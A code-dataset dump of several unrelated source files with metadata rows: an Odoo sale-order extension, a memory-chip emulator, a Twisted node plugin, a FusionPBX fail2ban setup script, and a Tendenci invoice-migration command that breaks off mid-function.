'sale.order': (lambda self, cr, uid, ids, c={}: ids, ['order_line'], 10),
'sale.order.line': (_get_order, ['price_unit', 'tax_id', 'discount', 'product_uom_qty','order_id'], 20),
},
multi='sums', help="The tax amount."),
'amount_total': fields.function(_amount_all, digits_compute=dp.get_precision('Account'), string='Total',
store={
'sale.order': (lambda self, cr, uid, ids, c={}: ids, ['order_line'], 10),
'sale.order.line': (_get_order, ['price_unit', 'tax_id', 'discount', 'product_uom_qty','order_id'], 20),
},
multi='sums', help="The total amount."),
'amt_in_words' : fields.function(_amt_in_words, method=True, string="Amount in Words", type="text",
store={
'sale.order': (lambda self, cr, uid, ids, c={}: ids, ['order_line'], 10),
'sale.order.line': (_get_order, ['price_unit', 'tax_id', 'discount', 'product_uom_qty','order_id'], 20),
},
help="Amount in Words.", track_visibility='always'),
'date_from' : fields.function(lambda *a,**k:{}, method=True, type='date',string="From"),
'date_to' : fields.function(lambda *a,**k:{}, method=True, type='date',string="To"),
'terms' : fields.text("Terms And Condition"),
'lock_it' : fields.function(_get_portal, type='boolean', string='Lock it'),
'sent_portal' : fields.boolean('Qtn Sent by Portal'),
'warehouse_id': fields.many2one('stock.warehouse', 'Warehouse', required=True),
# Overriden for old Records
# 'name': fields.char('Order Reference', required=True, copy=False,
# readonly=False, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}, select=True),
#
# 'do_name' : fields.char("Delivery Order No", size=25),
}
_defaults = {
'order_policy': 'picking',
'sent_portal': False,
'warehouse_id':_get_default_warehouse
}
# Duplicate Function.
def reorder(self, cr, uid, ids, context=None):
context = context or {}
print "YES"
res = self.copy(cr, uid, ids[0], {}, context)
view_ref = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'sale', 'view_order_form')
view_id = view_ref and view_ref[1] or False,
return {
'type': 'ir.actions.act_window',
'name': _('Sales Order'),
'res_model': 'sale.order',
'res_id': res,
'view_type': 'form',
'view_mode': 'form',
'view_id': view_id,
'target': 'current',
'nodestroy': True,
}
def _prepare_invoice(self, cr, uid, order, lines, context=None):
stock_obj = self.pool.get("stock.picking.out")
invoice_vals = super(sale_order,self)._prepare_invoice(cr, uid, order, lines, context)
pick_ids = stock_obj.search(cr, uid,[('sale_id','=',order.id)])
for pick in stock_obj.browse(cr, uid, pick_ids):
invoice_vals.update({
'transport' : pick.cust_po_ref or '',
'vehicle' : pick.vehicle or '',
'dc_ref' : pick.name or '',
})
return invoice_vals
# On select of customer pop up contact person
def onchange_partner_id(self, cr, uid, ids, part, context=None):
if not context:
context = {}
partner_obj = self.pool.get("res.partner")
partner_vals = super(sale_order,self).onchange_partner_id(cr, uid, ids, part, context=context)
if part:
partner = partner_obj.browse(cr, uid, part)
cont = partner_obj.search(cr, uid, [('parent_id','=',part)], limit=1)
partner_vals['value'].update({
'contact_id' : cont and cont[0] or False,
'pricelist_id': partner.property_product_pricelist.id
})
return partner_vals
def _prepare_order_picking(self, cr, uid, order, context=None):
res = super(sale_order,self)._prepare_order_picking(cr, uid, order, context)
res.update({
'contact_id' : order.contact_id and order.contact_id.id or False
})
return res
def quotation(self, cr, uid, ids, context=None):
case = self.browse(cr, uid, ids[0])
datas = {
'model': 'sale.order',
'ids': ids,
'form': self.read(cr, uid, ids[0], context=context),
}
return {
'type': 'ir.actions.report.xml',
'report_name': 'Sales Quotation',
'name' : case.name and 'Sales Quotation - ' + case.name or 'Sales Quotation',
'datas': datas,
'nodestroy': True
}
def action_quotation_send(self, cr, uid, ids, context=None):
'''
This function opens a window to compose an email, with the edi sale template message loaded by default
'''
assert len(ids) == 1, 'This option should only be used for a single id at a time.'
ir_model_data = self.pool.get('ir.model.data')
cr.execute("""select uid from res_groups_users_rel where gid=
(select id from res_groups where category_id in
( select id from ir_module_category where name = 'Customer Portal' ) and name = 'Manager') and uid = """+str(uid))
portal_user = cr.fetchone()
portal_group = portal_user and portal_user[0]
if uid == portal_group:
try:
template_id = ir_model_data.get_object_reference(cr, uid, 'magicemart', 'email_template_send_quotation')[1]
except ValueError:
template_id = False
try:
compose_form_id = ir_model_data.get_object_reference(cr, uid, 'mail', 'email_compose_message_wizard_form')[1]
except ValueError:
compose_form_id = False
ctx = dict(context)
ctx.update({
'default_model': 'sale.order',
'default_res_id': ids[0],
'default_use_template': bool(template_id),
'default_template_id': template_id,
'default_composition_mode': 'comment',
'mark_so_as_sent': True
})
else:
try:
template_id = ir_model_data.get_object_reference(cr, uid, 'sale', 'email_template_edi_sale')[1]
except ValueError:
template_id = False
try:
compose_form_id = ir_model_data.get_object_reference(cr, uid, 'mail', 'email_compose_message_wizard_form')[1]
except ValueError:
compose_form_id = False
ctx = dict(context)
ctx.update({
'default_model': 'sale.order',
'default_res_id': ids[0],
'default_use_template': bool(template_id),
'default_template_id': template_id,
'default_composition_mode': 'comment',
'mark_so_as_sent': True
})
return {
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'form',
'res_model': 'mail.compose.message',
'views': [(compose_form_id, 'form')],
'view_id': compose_form_id,
'target': 'new',
'context': ctx,
}
def create(self, cr, uid, vals, context = None):
print "sale",uid, context.get("uid")
print "Sale COntext",context
if not context:
context = {}
print "Create Wbsite Sale Order......",vals
partner_obj = self.pool.get("res.partner")
warehouse_obj = self.pool.get('stock.warehouse')
uid = context.get("uid",uid)
team_id = vals.get('team_id',False)
if team_id !=3:
if vals.get('warehouse_id',False):
warehouse = warehouse_obj.browse(cr, uid, vals.get('warehouse_id'))
#to select sub company shop
if not warehouse.company_id.parent_id:
raise osv.except_osv(_('User Error'), _('You must select sub company sale warehouse !'))
partner_id = vals.get('partner_id',False)
partner = partner_obj.browse(cr, uid, partner_id)
vals.update({
# 'pricelist_id':partner.property_product_pricelist.id,
'company_id':warehouse.company_id.id,
})
return super(sale_order, self).create(cr, uid, vals, context = context)
def write(self, cr, uid, ids, vals, context = None):
if not context:
context = {}
partner_obj = self.pool.get("res.partner")
warehouse_obj = self.pool.get('stock.warehouse')
if isinstance(ids, (int, long)):
ids = [ids]
if not ids:
return []
case = self.browse(cr, uid, ids[0])
if uid != 1:
if vals.get('warehouse_id',case.warehouse_id.id):
warehouse = warehouse_obj.browse(cr, uid, vals.get('warehouse_id',case.warehouse_id.id))
if not warehouse.company_id.parent_id:
raise osv.except_osv(_('User Error'), _('You must select sub company sale Warehouse !'))
if vals.get('partner_id', case.partner_id):
partner_id = vals.get('partner_id', case.partner_id.id)
partner = partner_obj.browse(cr, uid, partner_id)
vals.update({
# 'pricelist_id':partner.property_product_pricelist.id,
'company_id':warehouse.company_id.id,
})
return super(sale_order, self).write(cr, uid, ids, vals, context = context)
#inherited
def action_button_confirm(self, cr, uid, ids, context=None):
case = self.browse(cr, uid, ids[0])
for ln in case.order_line:
for t in ln.tax_id:
if t.company_id.id != case.company_id.id :
raise osv.except_osv(_('Configuration Error!'),_('Please define the taxes which is related to the company \n "%s" !')%(case.company_id.name))
return super(sale_order,self).action_button_confirm(cr, uid, ids, context)
# Inheriting action_ship_create Method to update Sale ID in Delivery Order
def action_ship_create(self, cr, uid, ids, context=None):
if not context:
context={}
pick_ids=[]
# context.get('active_ids').sort()
res=super(sale_order, self).action_ship_create(cr, uid, ids,context)
pick=self.pool.get('stock.picking')
for case in self.browse(cr,uid,ids):
pick_ids=pick.search(cr,uid,[('group_id','=',case.procurement_group_id.id)])
pick.write(cr,uid,pick_ids,{
'sale_id' : case.id,
'company_id' : case.company_id.id,
})
return res
#
# def web_comp_tax(self,cr, uid, ids, warehouse_id, company_id, context=None):
# context = dict(context or {})
# print "Wrehouse Sale.........",warehouse_id
# if warehouse_id:
# self.write(cr, uid, ids, {"warehouse_id":warehouse_id,
# 'company_id':company_id,
# })
# return True
sale_order()
class sale_order_line(osv.osv):
_name = 'sale.order.line'
_inherit = 'sale.order.line'
_description = 'Sales Order Line'
def _get_order(self, cr, uid, ids, context=None):
result = {}
for line in self.pool.get('sale.order.line').browse(cr, uid, ids, context=context):
result[line.order_id.id] = True
return result.keys()
def _get_price_reduce(self, cr, uid, ids, field_name, arg, context=None):
res = dict.fromkeys(ids, 0.0)
for line in self.browse(cr, uid, ids, context=context):
res[line.id] = line.price_subtotal / line.product_uom_qty
return res
def _amount_line(self, cr, uid, ids, field_name, arg, context=None):
tax_obj = self.pool.get('account.tax')
cur_obj = self.pool.get('res.currency')
res = {}
if context is None:
context = {}
if context.get("uid"):
if uid != context.get("uid",False):
uid = context.get("uid")
for line in self.browse(cr, uid, ids, context=context):
res[line.id] = {'price_total':0.0,'price_subtotal':0.0}
price = line.price_unit #* (1 - (line.discount or 0.0) / 100.0)
taxes = tax_obj.compute_all(cr, uid, line.tax_id, price, line.product_uom_qty, line.product_id, line.order_id.partner_id)
# print "Taxes......", taxes
cur = line.order_id.pricelist_id.currency_id
res[line.id]['price_subtotal'] = cur_obj.round(cr, uid, cur, taxes['total'])
# for price total
amount = taxes['total']
for t in taxes.get('taxes',False):
amount += t['amount']
res[line.id]['price_total'] = cur_obj.round(cr, uid, cur, amount)
return res
# Overriden, to remove the discount calculation(coz, discount is already considered in unit price.)
def _product_margin(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for line in self.browse(cr, uid, ids, context=context):
res[line.id] = 0
if line.product_id:
if line.purchase_price:
res[line.id] = round((line.price_unit*line.product_uos_qty ) -(line.purchase_price*line.product_uos_qty), 2)
else:
res[line.id] = round((line.price_unit*line.product_uos_qty ) -(line.product_id.standard_price*line.product_uos_qty), 2)
return res
_columns = {
'price_total' : fields.function(_amount_line, string='Subtotal1', digits_compute= dp.get_precision('Account'), store=True, multi="all"),
'price_subtotal': fields.function(_amount_line, string='Subtotal', digits_compute= dp.get_precision('Account'), multi="all",store=True),
'reference' : fields.char("Reference(BOP)", size=20),
# 'mrp' : fields.related('product_id','list_price', type="float", string="MRP", store=True),
# 'available_qty' : fields.related('product_id','qty_available', type="float", string="Available Quantity", store=True ),
'product_image' : fields.binary('Image'),
'sale_mrp' : fields.float('MRP', digits=(16,2)),
'available_qty' : fields.integer("Available Quantity"),
# Overriden,to remove the discount calculation(coz, discount is already considered in unit price.)
'margin': fields.function(_product_margin, string='Margin',
store = True),
'price_reduce': fields.function(_get_price_reduce, type='float', string='Price Reduce', digits_compute=dp.get_precision('Product Price')),
}
_order = 'id asc'
def _prepare_order_line_invoice_line(self, cr, uid, line, account_id=False, context=None):
res = super(sale_order_line,self)._prepare_order_line_invoice_line(cr, uid, line, account_id, context=context)
if res:
res.update({'reference': line.reference})
return res
# Overriden
def product_id_change(self, cr, uid, ids, pricelist, product, qty=0,
uom=False, qty_uos=0, uos=False, name='', partner_id=False,
lang=False, update_tax=True, date_order=False, packaging=False, fiscal_position=False, flag=False, context=None):
context = context or {}
part_obj = self.pool.get("res.partner")
if context.get("uid"):
if context and uid != context.get("uid",False):
uid = context.get("uid")
user_obj = self.pool.get("res.users")
user = user_obj.browse(cr, uid, [context.get("uid",uid)])
partner = part_obj.browse(cr, uid, [user.partner_id.id])
partner_id = partner.id
lang = lang or context.get('lang', False)
if not partner_id:
raise osv.except_osv(_('No Customer Defined!'), _('Before choosing a product,\n select a customer in the sales form.'))
warning = False
product_uom_obj = self.pool.get('product.uom')
partner_obj = self.pool.get('res.partner')
product_obj = self.pool.get('product.product')
context = {'lang': lang, 'partner_id': partner_id}
partner = partner_obj.browse(cr, uid, partner_id)
lang = partner.lang
# lang = context.get("lang",False)
context_partner = {'lang': lang, 'partner_id': partner_id}
if not product:
return {'value': {'th_weight': 0,
'product_uos_qty': qty}, 'domain': {'product_uom': [],
'product_uos': []}}
if not date_order:
date_order = time.strftime(DEFAULT_SERVER_DATE_FORMAT)
result = {}
warning_msgs = ''
product_obj = product_obj.browse(cr, uid, product, context=context_partner)
uom2 = False
if uom:
uom2 = product_uom_obj.browse(cr, uid, uom)
if product_obj.uom_id.category_id.id != uom2.category_id.id:
uom = False
if uos:
if product_obj.uos_id:
uos2 = product_uom_obj.browse(cr, uid, uos)
if product_obj.uos_id.category_id.id != uos2.category_id.id:
uos = False
else:
uos = False
fpos = False
if not fiscal_position:
fpos = partner.property_account_position or False
else:
fpos = self.pool.get('account.fiscal.position').browse(cr, uid, fiscal_position)
if update_tax: #The quantity only have changed
result['tax_id'] = self.pool.get('account.fiscal.position').map_tax(cr, uid, fpos, product_obj.taxes_id)
if not flag:
result['name'] = self.pool.get('product.product').name_get(cr, uid, [product_obj.id], context=context_partner)[0][1]
if product_obj.description_sale:
result['name'] += '\n'+product_obj.description_sale
domain = {}
if (not uom) and (not uos):
result['product_uom'] = product_obj.uom_id.id
if product_obj.uos_id:
result['product_uos'] = product_obj.uos_id.id
result['product_uos_qty'] = qty * product_obj.uos_coeff
uos_category_id = product_obj.uos_id.category_id.id
else:
result['product_uos'] = False
result['product_uos_qty'] = qty
uos_category_id = False
result['th_weight'] = qty * product_obj.weight
domain = {'product_uom':
[('category_id', '=', product_obj.uom_id.category_id.id)],
'product_uos':
[('category_id', '=', uos_category_id)]}
elif uos and not uom: # only happens if uom is False
result['product_uom'] = product_obj.uom_id and product_obj.uom_id.id
result['product_uom_qty'] = qty_uos / product_obj.uos_coeff
result['th_weight'] = result['product_uom_qty'] * product_obj.weight
elif uom: # whether uos is set or not
default_uom = product_obj.uom_id and product_obj.uom_id.id
q = product_uom_obj._compute_qty(cr, uid, uom, qty, default_uom)
if product_obj.uos_id:
result['product_uos'] = product_obj.uos_id.id
result['product_uos_qty'] = qty * product_obj.uos_coeff
else:
result['product_uos'] = False
result['product_uos_qty'] = qty
result['th_weight'] = q * product_obj.weight # Round the quantity up
if not uom2:
uom2 = product_obj.uom_id
# get unit price
if not pricelist:
warn_msg = _('You have to select a pricelist or a customer in the sales form !\n'
'Please set one before choosing a product.')
warning_msgs += _("No Pricelist ! : ") + warn_msg +"\n\n"
else:
price = self.pool.get('product.pricelist').price_get(cr, uid, [pricelist],
product, qty or 1.0, partner_id, {
'uom': uom or result.get('product_uom'),
'date': date_order,
})[pricelist]
if price is False:
warn_msg = _("Cannot find a pricelist line matching this product and quantity.\n"
"You have to change either the product, the quantity or the pricelist.")
warning_msgs += _("No valid pricelist line found ! :") + warn_msg +"\n\n"
else:
result.update({'price_unit': price})
if warning_msgs:
warning = {
'title': _('Configuration Error!'),
'message' : warning_msgs
}
return {'value': result, 'domain': domain, 'warning': warning}
#inherited
def product_id_change_with_wh(self, cr, uid, ids, pricelist, product, qty=0,
uom=False, qty_uos=0, uos=False, name='', partner_id=False,
lang=False, update_tax=True, date_order=False, packaging=False, fiscal_position=False, flag=False, warehouse_id=False, context=None):
if not context:
context= {}
context = dict(context)
case = self.browse(cr, uid, ids)
uom = case.product_uom and case.product_uom.id or False
res = super(sale_order_line,self).product_id_change_with_wh(cr, uid, ids, pricelist, product, qty, uom, qty_uos, uos, name, partner_id, lang, update_tax, date_order, packaging, fiscal_position, flag, warehouse_id,context)
#if the product changes and product not in price_list then it will take the sale price
location_ids =[]
unit_amt = 0.00
move_obj = self.pool.get("stock.move")
loc_obj = self.pool.get("stock.location")
prod_obj =self.pool.get("product.product")
prod = prod_obj.browse(cr, uid,product)
pricelist_obj = self.pool.get("product.pricelist")
warehouse_obj = self.pool.get("stock.warehouse")
pricelist_id = pricelist_obj.browse(cr, uid, pricelist)
if warehouse_id: # shop is nothing but company_id
context.update({'warehouse':warehouse_id})
warehouse = warehouse_obj.browse(cr, uid, warehouse_id)
res['value']['company_id'] = warehouse.company_id.id
# warehouse_id = context.get('warehouse_id')
# warehouse = self.pool.get("stock.warehouse").browse(cr, uid, warehouse_id)
# comp_id = warehouse.company_id.id
# location_ids = loc_obj.search(cr, uid,[('company_id','=',comp_id ),('name','=','Stock')])
# if location_ids:
# location_ids = location_ids[0]
if product:
available_qty = prod_obj._product_available(cr, uid, [product], None, False, context)
available_qty = available_qty[product].get('qty_available',0)
# Commented for Pricelist Concept
if pricelist_id.name == 'Public Pricelist' or not res['value'].get('price_unit'):
unit_amt = prod.discount and prod.list_price - ((prod.discount/100) * prod.list_price) or prod.list_price
res['value']['discount'] = prod.discount
if not res['value'].get('price_unit') and product:
res['value']['price_unit'] = unit_amt and unit_amt or prod.list_price
warn_msg = _('No Product in The Current Pricelist, It Will Pick The Sales Price')
warning_msgs = _("No Pricelist ! : ") + warn_msg +"\n\n"\
res['warning'] = {
'title': _('Configuration Error!'),
'message' : warning_msgs
}
if product:
res['value']['sale_mrp'] = prod.list_price
res['value']['product_image'] = prod.image_medium
res['value']['available_qty'] = available_qty
res['value']['purchase_price'] = prod.standard_price or 0.00
# Commented for Pricelist Concept
if unit_amt :
res['value']['price_unit'] = unit_amt
return res
def create(self, cr, uid, vals, context=None):
if not context:
context = {}
if context.get("uid"):
if uid != context.get("uid",False):
uid = context.get("uid")
context = dict(context)
uom_obj = self.pool.get("product.uom")
loc_obj = self.pool.get("stock.location")
move_obj = self.pool.get("stock.move")
sale_obj = self.pool.get("sale.order")
prod_obj = self.pool.get("product.product")
tax_obj = self.pool.get("account.tax")
order_id = vals.get('order_id')
case = sale_obj.browse(cr, uid,order_id )
company_id = case.warehouse_id.company_id.id
res = self.product_id_change_with_wh(cr, uid, [], case.pricelist_id.id,vals.get('product_id',False),vals.get('qty',0), vals.get('uom',False), vals.get('qty_uos',0),
vals.get('uos',False), vals.get('name',''), case.partner_id.id, vals.get('lang',False), vals.get('update_tax',True), vals.get('date_order',False),
vals.get('packaging',False), vals.get('fiscal_position',False), vals.get('flag',False),warehouse_id=case.warehouse_id.id,context=context)['value']
prod_uom = case.product_id.uom_id.id
line_uom = vals.get('product_uom')
# For Case of UOM
if prod_uom != line_uom:
uom = uom_obj.browse(cr, uid, vals.get('product_uom'))
if uom.factor:
vals.update({
'price_unit' : float(res.get('price_unit')) / float(uom.factor)
})
if case.warehouse_id: # shop is nothing but company_id
context.update({'warehouse':case.warehouse_id.id})
# Commented for Pricelist Concept
if res.get('discount'):
vals.update({
'discount' : res.get('discount') and res.get('discount') or 0.00,
})
if res.get('price_unit') and prod_uom == line_uom:
vals.update({
'price_unit' : res.get('price_unit') and res.get('price_unit') or 0.00,
})
if res.get("price_unit") and prod_uom == line_uom:
vals.update({'price_unit':res.get("price_unit")})
if not vals.get('price_unit')or not res.get('price_unit'):
raise osv.except_osv(_('Warning'), _('Please Enter The Unit Price For \'%s\'.') % (vals['name'],))
location_ids = loc_obj.search(cr, uid,[('company_id','=', company_id),('name','=','Stock')])
comp_id = vals.get("company_id",case.company_id)
if res.get("tax_id"):
tax = tax_obj.browse(cr, uid, res.get("tax_id"))
for t in tax:
if t.company_id.id == comp_id.id:
vals.update({
'tax_id' : [(6, 0, [t.id])],
})
if location_ids:
location_ids = location_ids[0]
product = vals.get('product_id', False)
available_qty = prod_obj._product_available(cr, uid, [product], None, False, context)
available_qty = available_qty[product].get('qty_available',0)
prod = prod_obj.browse(cr, uid, vals.get("product_id",False))
vals.update({'available_qty' : available_qty and available_qty or 0,
'product_image':prod.image_medium,
'sale_mrp':prod.lst_price})
return super(sale_order_line, self).create(cr, uid, vals, context=context)
def write(self, cr, uid, ids, vals, context=None):
if not context:
context = {}
if context and uid != context.get("uid",False):
uid = context.get("uid")
if not uid:
uid = SUPERUSER_ID
context = dict(context)
prodtemp_obj = self.pool.get("product.template")
loc_obj = self.pool.get("stock.location")
move_obj = self.pool.get("stock.move")
prod_obj = self.pool.get("product.product")
tax_obj = self.pool.get("account.tax")
user_obj = self.pool.get("res.users")
uom_obj = self.pool.get("product.uom")
for case in self.browse(cr, uid, ids):
price_unit = vals.get('price_unit')
prod_id = vals.get("product_id", case.product_id.id)
prod = prod_obj.browse(cr, uid, [prod_id])
# prodtemp_id = prod_obj.browse(cr, uid,[prod.product_tmpl_id.id] )
pricelist_id = case.order_id.pricelist_id.id
context.update({'quantity':case.product_uom_qty or 1.0 })
context.update({'pricelist': pricelist_id or False})
context.update({'partner': case.order_id.partner_id.id or False})
# Calling This method update price_unit as Pricelist Price or Price After Discount or Sales Price
prodtemp = prodtemp_obj._product_template_price(cr, uid, [prod.product_tmpl_id.id], 'price', False, context=context)
price_unit = prodtemp[prod.product_tmpl_id.id]
if price_unit <=0.00 and not prod.type == 'service':
raise osv.except_osv(_('Warning'), _('Please Enter The Unit Price For \'%s\'.') % (case.name))
if not price_unit:
price_unit = case.price_unit
if price_unit <= 0.00 and not prod.type == 'service':
raise osv.except_osv(_('Warning'), _('Please Enter The Unit Price For \'%s\'.') % (case.name))
if price_unit:
vals.update({
'price_unit':price_unit
})
if vals.get('warehouse_id',case.order_id.warehouse_id.id): # shop is nothing but company_id
context.update({'warehouse':vals.get('warehouse_id',case.order_id.warehouse_id.id)})
product = vals.get('product_id', case.product_id.id)
available_qty = prod_obj._product_available(cr, uid, [product], None, False, context)
available_qty = available_qty[product].get('qty_available',0)
prod = prod_obj.browse(cr, uid,[product])
vals.update({
'available_qty' : available_qty,
'product_image':prod.image_medium,
'sale_mrp':prod.lst_price
})
res = self.product_id_change_with_wh(cr, uid, [], case.order_id.pricelist_id.id,vals.get('product_id',case.product_id.id),vals.get('qty',0), vals.get('uom',case.product_uom.id), vals.get('qty_uos',0),
vals.get('uos',False), vals.get('name',''), case.order_id.partner_id.id, vals.get('lang',False), vals.get('update_tax',True), vals.get('date_order',False),
vals.get('packaging',False), vals.get('fiscal_position',False), vals.get('flag',False),warehouse_id=case.order_id.warehouse_id.id,context=context)['value']
# For Case of UOM
prod_uom = prod.uom_id.id
line_uom = vals.get('product_uom',case.product_uom.id)
if prod_uom != line_uom:
uom = uom_obj.browse(cr, uid, line_uom)
if uom.factor:
vals.update({
'price_unit' : float(res.get('price_unit')) / float(uom.factor),
'available_qty' : available_qty,
# Commented for Pricelist Concept
'discount' : res.get('discount') and res.get('discount') or 0,
})
if prod_uom == line_uom:
vals.update({
'available_qty' : available_qty,
# Commented for Pricelist Concept
'discount' : res.get('discount') and res.get('discount') or 0,
'price_unit': res.get("price_unit") and res.get("price_unit") or 1
})
if res.get("tax_id"):
comp_id = vals.get("company_id",case.company_id.id)
if res.get("company_id"):
comp_id = res.get("company_id", case.company_id)
tax = tax_obj.browse(cr, uid, res.get("tax_id"))
for t in tax:
if t.company_id.id == comp_id:
vals.update({
'tax_id' : [(6, 0, [t.id])],
})
return super(sale_order_line, self).write(cr, uid, [case.id], vals, context=context)
sale_order_line()
| agpl-3.0 | -6,004,310,348,129,873,000 | 47.130389 | 337 | 0.514135 | false | 3.985372 | false | false | false |
BenProjex/ArchProject | chip/Memory.py | 1 | 2024 |
#!/usr/bin/python
WRITE = 1
READ = 0
###########################################################
#Don't worry about class Chip cuz Memory class use it only#
###########################################################
class Chip:
def __init__(self,name):
self.data = [0]*(2**12)
self.name =name;
#rdOrwr: 0 for read and 1 for write
def read8bit(self,address,data):
print("read data at chip: ",self.name," address [$", address,"] = $", self.data[address],".");
return self.data[address]
def write8bit(self,address,data):
print("Write $",data," to chip: ",self.name," address [$", address,"].");
self.data[address] = data
###############################################################
#Memory class will work as a real memory that will store #
#instruction pointer and data. #
#we can call memoryOp function to read or write data to memory
#
#exmple:
#m = Memory()
#m.memoryOp(4096,34,1) #memoryOp(address,data,rdOrwr)
#now rdOrwr(1bit) = 1 mean write to memory
#this call will write data(8bit) = 34 to address(16bit)=4096
#
#m.memoryOp(4096,34,0) #memoryOp(address,data,rdOrwr)
#now rdOrwr(1bit) = 0 mean read from memory
#notice: we won't use parameter data in this call.
#this call will read from memory address(16bit)=4096 and return#
#data(8bit) #
################################################################
class Memory:
def __init__(self):
self.chip = [Chip("U" + str(200+i)) for i in range(15)]
def memoryOp(self,address,data,rdOrwr):
if(address<=65535):
chipselect = address >> 12
chipaddr = address & 4095
if rdOrwr == WRITE:
self.chip[chipselect].write8bit(chipaddr,data)
elif rdOrwr == READ:
return self.chip[chipselect].read8bit(chipaddr,data)
else:
return None
else:
raise Exception('the address is overflow')
#temp = Memory();
#temp.memoryOp(5000,300,WRITE);
#print(temp.memoryOp(5000,300,READ)); | gpl-3.0 | -5,691,190,682,838,375,000 | 34.526316 | 98 | 0.551877 | false | 3.601423 | false | false | false |
dr4ke616/pinky | twisted/plugins/node.py | 1 | 1334 | from zope.interface import implements
from twisted.python import usage
from twisted.plugin import IPlugin
from twisted.application.service import IServiceMaker
from pinky.node.service import NodeService
class Options(usage.Options):
optParameters = [
['port', None, None, 'The port number to listen on.'],
['host', None, None, 'The host address to bind to.'],
['broker_host', 'h', None, 'The broker host to connect to.'],
['broker_port', 'p', 43435, 'The broker port to connect to.']
]
optFlags = [
['debug', 'b', 'Enable/disable debug mode.']
]
class NodeServiceMaker(object):
implements(IServiceMaker, IPlugin)
tapname = "node"
description = "Startup an instance of the Pinky node"
options = Options
def makeService(self, options):
""" Construct a Node Server
"""
return NodeService(
port=options['port'],
host=options['host'],
broker_host=options['broker_host'],
broker_port=options['broker_port'],
debug=options['debug']
)
# Now construct an object which *provides* the relevant interfaces
# The name of this variable is irrelevant, as long as there is *some*
# name bound to a provider of IPlugin and IServiceMaker.
serviceMaker = NodeServiceMaker()
| mit | -2,104,320,416,493,700,000 | 28.644444 | 69 | 0.646927 | false | 4.006006 | false | false | false |
jordanrinke/fusionpbx-installer | installers/fail2ban.py | 1 | 2492 | import shutil
import subprocess
import sys
import os
"""
FusionPBX
Version: MPL 1.1
The contents of this file are subject to the Mozilla Public License Version
1.1 (the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.mozilla.org/MPL/
Software distributed under the License is distributed on an "AS IS" basis,
WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
for the specific language governing rights and limitations under the
License.
The Initial Developer of the Original Code is
Jim Millard <[email protected]>
Portions created by the Initial Developer are Copyright (C) 2008-2016
the Initial Developer. All Rights Reserved.
Contributor(s):
Mark J. Crane <[email protected]>
"""
def ifail2ban(fpbxparms):
INSTALL_ROOT = os.getcwd()
if os.path.isfile("%s/resources/install.json" % (INSTALL_ROOT)):
fpbxparms.PARMS = fpbxparms.load_parms(fpbxparms.PARMS)
else:
print("Error no install parameters")
sys.exit(1)
print("Setting up fail2ban to protect your system from some types of attacks")
if os.path.isfile("%s/resources/fail2ban/jail.local" % (INSTALL_ROOT)):
if fpbxparms.whitelist != '':
shutil.copyfile("%s/resources/fail2ban/jail.package" %
(INSTALL_ROOT), "/etc/fail2ban/jail.local")
else:
shutil.copyfile("%s/resources/fail2ban/jail.source" %
(INSTALL_ROOT), "/etc/fail2ban/jail.local")
shutil.copyfile("%s/resources/fail2ban/freeswitch-dos.conf" %
(INSTALL_ROOT), "/etc/fail2ban/filter.d/freeswitch-dos.conf")
shutil.copyfile("%s/resources/fail2ban/fusionpbx.conf" %
(INSTALL_ROOT), "/etc/fail2ban/filter.d/fusionpbx.conf")
if fpbxparms.PARMS["FS_Install_Type"][0] == "P":
ftb = open("/etc/fail2ban/jail.local", 'a')
ftb.write("[DEFAULT]")
ftb.write("\n")
ftb.write("ignoreip = %s" % (fpbxparms.whitelist))
ftb.write("\n")
ftb.close()
ret = subprocess.call("systemctl restart fail2ban",
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, shell=True)
fpbxparms.check_ret(ret, "Restart fail2ban")
return
| mit | 6,252,150,104,698,604,000 | 39.852459 | 99 | 0.620385 | false | 3.827957 | false | false | false |
alirizakeles/tendenci | tendenci/apps/invoices/management/commands/update_inv_tb.py | 1 | 4500 | from django.core.management.base import BaseCommand, CommandError
class Command(BaseCommand):
def handle(self, *args, **options):
# command to run: python manage.py update_inv_tb
"""
This command will:
1) add the object_type field
2) populate the object_type field based on the content in invoice_object_type
3) drop field invoice_object_type
4) rename field invoice_object_type_id to object_id
"""
from django.db import connection, transaction
from django.contrib.contenttypes.models import ContentType
cursor = connection.cursor()
# add the object_type field
cursor.execute("ALTER TABLE invoices_invoice ADD object_type_id int AFTER guid")
transaction.commit_unless_managed()
print "Field object_type_id - Added"
# assign content type to object_type based on the invoice_object_type
try:
ct_make_payment = ContentType.objects.get(app_label='make_payments', model='MakePayment')
except:
ct_make_payment = None
try:
ct_donation = ContentType.objects.get(app_label='donations', model='Donation')
except:
ct_donation = None
try:
ct_job = ContentType.objects.get(app_label='jobs', model='Job')
except:
ct_job = None
try:
ct_directory = ContentType.objects.get(app_label='directories', model='Directory')
except:
ct_directory = None
try:
ct_event_registration = ContentType.objects.get(app_label='events', model='Registration')
except:
ct_event_registration = None
try:
ct_corp_memb = ContentType.objects.get(app_label='corporate_memberships', model='CorporateMembership')
except:
ct_corp_memb = None
if ct_make_payment:
cursor.execute("""UPDATE invoices_invoice
SET object_type_id=%s
WHERE (invoice_object_type='make_payment'
OR invoice_object_type='makepayments') """, [ct_make_payment.id])
transaction.commit_unless_managed()
if ct_donation:
cursor.execute("""UPDATE invoices_invoice
SET object_type_id=%s
WHERE (invoice_object_type='donation'
OR invoice_object_type='donations') """, [ct_donation.id])
transaction.commit_unless_managed()
if ct_job:
cursor.execute("""UPDATE invoices_invoice
SET object_type_id=%s
WHERE (invoice_object_type='job'
OR invoice_object_type='jobs') """, [ct_job.id])
transaction.commit_unless_managed()
if ct_directory:
cursor.execute("""UPDATE invoices_invoice
SET object_type_id=%s
WHERE (invoice_object_type='directory'
OR invoice_object_type='directories') """, [ct_directory.id])
transaction.commit_unless_managed()
if ct_event_registration:
cursor.execute("""UPDATE invoices_invoice
SET object_type_id=%s
WHERE (invoice_object_type='event_registration'
OR invoice_object_type='calendarevents') """, [ct_event_registration.id])
if ct_corp_memb:
cursor.execute("""UPDATE invoices_invoice
SET object_type_id=%s
WHERE (invoice_object_type='corporate_membership'
OR invoice_object_type='corporatememberships') """, [ct_corp_memb.id])
transaction.commit_unless_managed()
print "Field object_type_id - Populated"
# drop field invoice_object_type
